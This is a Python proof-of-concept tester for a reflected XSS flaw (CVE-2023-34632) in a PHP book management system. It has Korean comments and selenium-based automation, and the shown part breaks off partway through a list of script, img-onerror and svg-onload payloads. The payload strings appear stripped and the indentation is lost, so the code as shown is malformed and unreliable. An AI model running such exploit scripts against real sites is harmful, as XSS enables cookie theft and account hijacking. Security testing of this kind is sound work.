#!/usr/bin/env python3
"""
CVE-2023-34632 PoC Auto-Tester
1000projects Book Management System 1.0 - Reflected XSS via Search Box
"""
import argparse
import json
import os
import sys
import time
import urllib.parse
from datetime import datetime
try:
import requests
except ImportError:
print("[!] requests 모듈이 필요합니다: pip install requests")
sys.exit(1)
try:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import (
TimeoutException, UnexpectedAlertPresentException,
NoAlertPresentException, NoSuchElementException
)
SELENIUM_AVAILABLE = True
except ImportError:
SELENIUM_AVAILABLE = False
print("[!] selenium 모듈이 없습니다. 수동 테스트 모드로 전환합니다.")
print(" 설치: pip install selenium webdriver-manager")
# ============================================================
# XSS 페이로드 목록
# ============================================================
XSS_PAYLOADS = [
# 기본 script 태그
{
"name": "Basic script alert",
"payload": '">',
"detect": "alert"
},
# img onerror
{
"name": "IMG onerror",
"payload": '">
',
"detect": "alert"
},
# svg onload
{
"name": "SVG onload",
"payload": '">